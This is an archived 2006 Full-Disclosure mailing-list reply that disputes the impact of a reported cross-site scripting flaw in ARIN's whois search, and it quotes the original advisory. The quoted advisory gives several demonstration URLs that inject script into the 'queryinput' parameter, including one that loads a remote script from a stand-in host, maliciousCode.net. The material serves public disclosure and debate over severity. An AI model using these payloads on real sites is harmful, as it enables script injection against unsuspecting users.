[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Arin.net XSS
- To: "Terminal Entry" <Security@xxxxxxxxxx>, "Full Disclosure" <full-disclosure@xxxxxxxxxxxxxxxxx>, "Bug Traq" <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Arin.net XSS
- From: "Steven" <steven@xxxxxxxxxxx>
- Date: Fri, 3 Mar 2006 15:33:30 -0500
ok?
So what exactly are you going to exploit here? This site doesn't have any
logins or even use cookies. Are you going to trick a user into entering in a
credit card number before they can search the whois database?
I think that XSS in many instances is a serious issues. Many of the XSS issues
reported on FD are rarely of much consequence but could theoretically lead to a
sessions hijack or tricking the user into a fake login screen. However, in
this instance I fail to see what the point could possible be? If it is that
you can simply run javascript then so what? Close to 100% of any webhosting
provider on the internet will let you upload your own javascript. Might as
well report that geocities.com is vulnerable to XSS because you could upload an
html file with javascript on it.
Anyway.. that's my take on this. Feel free to correct me.. I don't mind.
Steven
----- Original Message -----
From: Terminal Entry
To: Full Disclosure ; Bug Traq
Sent: Thursday, March 02, 2006 11:17 PM
Subject: [Full-disclosure] Arin.net XSS
Title
ARIN.NET input validation holes in "?queryinput=" allows remote users conduct
cross-site scripting attacks
Notification
Multiple attempts to contact Arin site administrators went unanswered
Exploit Included: Yes
Description
The "?queryinput=" script does not properly validate user-supplied input in
several parameters to filter HTML code. A remote user can create a specially
crafted URL that, when loaded by a target user, will cause arbitrary scripting
code to be executed by the target user's browser.
Some demonstration exploit URLs are provided:
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
Discovered by Terminal Entry security [.at.] peadro (.)net
------------------------------------------------------------------------------
This email and any files transmitted with it are confidential and intended
solely for the use of the individual or entity to whom they are addressed. If
you have received this email in error please notify the system manager. This
message contains confidential information and is intended only for the
individual named. If you are not the named addressee you should not
disseminate, distribute or copy this e-mail. Please notify the sender
immediately by e-mail if you have received this e-mail by mistake and delete
this e-mail from your system. If you are not the intended recipient you are
notified that disclosing, copying, distributing or taking any action in
reliance on the contents of this information is strictly prohibited.
------------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/